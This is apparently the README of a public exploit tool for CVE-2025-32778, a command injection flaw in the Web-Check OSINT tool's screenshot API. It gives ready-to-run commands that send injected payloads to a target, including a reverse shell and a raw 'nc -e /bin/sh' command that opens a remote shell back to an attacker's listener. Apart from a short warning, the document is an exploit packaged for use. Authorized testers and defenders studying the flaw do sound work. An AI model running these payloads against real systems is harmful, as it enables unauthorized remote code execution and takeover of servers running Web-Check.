# CVE-2025-32778 - Web-Check Command Injection Exploit

[![Critical](https://img.shields.io/badge/CVSS-9.3-critical)](https://nvd.nist.gov/vuln/detail/CVE-2025-32778)
[![Language: Python](https://img.shields.io/badge/Python-3.x-blue)](https://www.python.org/)

## Description

CVE-2025-32778 is a critical command injection vulnerability in **Web-Check** OSINT tool by Lissy93.  
It allows unauthenticated attackers to execute arbitrary system commands via the `url` parameter in the screenshot API.

This Python script automates exploitation and can generate reverse shells or accept custom shell payloads.

---

## Warning

- Only test on systems you own or are authorized to test.
- Unauthorized use is illegal and unethical.

---

## Features

- Exploit `url` command injection in Web-Check.
- Supports:
  - Reverse shell with `--lhost` and `--lport`.
  - Custom shell via `--shell`.
- URL normalization.
- Prevents combining `--shell` with `--lhost/--lport`.

---

## Requirements

- Python 3.x
- Requests library:

```bash
pip install requests
```
---
## Usage
```bash
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
```
### Make the tool create a reverse shell
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
```
### Custom Shell Payload (Raw)
```bash
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
```
### Help Menu
```bash
python3 cve-2025-32778.py -h
```
---
## How It Works

1. Normalize the target URL to `scheme://host[:port]`.

2. Prepare the payload:
   * Generate a reverse shell using `--lhost` and `--lport`.
   * Or use a raw shell command with `--shell`.

3. Encode the shell payload for safe URL injection.

4. Send an HTTP GET request to `/api/screenshot/` with the payload.

5. Wait for the reverse shell connection.
---
## 🧑‍💻 Author
**00xCanelo**  
[GitHub Profile](https://github.com/00xCanelo)

---
## References
- [Web-Check GitHub Repository](https://github.com/lissy93/web-check) – Original project containing the vulnerable code.
- [CVE-2025-32778](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32778) – CVE entry describing the command injection vulnerability.  
